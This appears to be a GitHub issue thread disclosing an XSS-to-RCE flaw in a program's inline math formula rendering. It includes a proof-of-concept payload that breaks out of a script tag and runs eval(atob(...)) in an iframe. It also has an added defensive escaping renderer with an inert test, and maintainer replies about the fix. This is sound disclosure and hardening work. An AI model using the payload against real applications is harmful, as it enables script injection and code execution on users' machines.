The XSS with resultant RCE vulnerability when rendering Mathematical formula inline. #2131

Closed
Li4n0 opened this issue Jan 26, 2019 · 2 comments

@Li4n0 commented Jan 26, 2019

The new version (v0.9.64) only fixed the vulnerability when rendering mathematical formulas in block. However, it also has this problem when rendering inline, so the new PoC:

$</script><iframe src=javascript:eval(atob('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'))></iframe>$
@Li4n0 changed the title from "The XSS vulnerability when rendering Mathematical formula inline." to "The XSS with resultant RCE vulnerability when rendering Mathematical formula inline." on Jan 26, 2019
@abnerlee added the bug label Jan 26, 2019
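
As an added example (not code from this project or from anyone in this thread): the report says the earlier fix covered block formulas but missed inline ones, so this renderer sends both kinds through one escaping function and checks them with the same inert input. The function names, the `math-inline`/`math-block` classes and the wrapper elements are assumptions, as is the premise that a math library later typesets each element's text content.

```javascript
// Hypothetical renderer for illustration; all names here are assumptions.

// Encode every character that could close a text node, attribute or raw-text element.
function escapeHtml(text) {
  return text.replace(/[&<>"'`]/g, (ch) => "&#" + ch.charCodeAt(0) + ";");
}

// Single sink for both formula kinds, so a fix cannot cover one and miss the other.
function mathToHtml(tex, display) {
  const tag = display ? "div" : "span";
  const cls = display ? "math-block" : "math-inline";
  return `<${tag} class="${cls}">${escapeHtml(tex)}</${tag}>`;
}

// Render $$...$$ (block) and $...$ (inline); everything else is escaped as plain text.
function renderMath(source) {
  const pattern = /\$\$([\s\S]+?)\$\$|\$([^$\n]+?)\$/g;
  let out = "";
  let last = 0;
  for (const m of source.matchAll(pattern)) {
    out += escapeHtml(source.slice(last, m.index));
    out += m[1] !== undefined ? mathToHtml(m[1], true) : mathToHtml(m[2], false);
    last = m.index + m[0].length;
  }
  return out + escapeHtml(source.slice(last));
}

// Regression check: after removing the wrappers this renderer emits,
// any remaining "<" can only have come from untrusted input.
function containsRawMarkup(html) {
  const wrappers = /<\/?(span|div)( class="math-(inline|block)")?>/g;
  return html.replace(wrappers, "").includes("<");
}

// Constructed, inert sample with the same tag-breakout shape as the report.
const SAMPLE = "</script><iframe src=x></iframe>";
const inlineHtml = renderMath("a $" + SAMPLE + "$ b");
const blockHtml = renderMath("$$" + SAMPLE + "$$");
console.log(inlineHtml);
console.log(blockHtml);
```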
@abnerlee (Contributor) commented Feb 17, 2019

fixed in new release

@abnerlee closed this Feb 17, 2019

@attritionorg commented Mar 20, 2019

@abnerlee Can you link to the fixing commit and/or a reference for the 'new release'? This project does not show any releases currently.
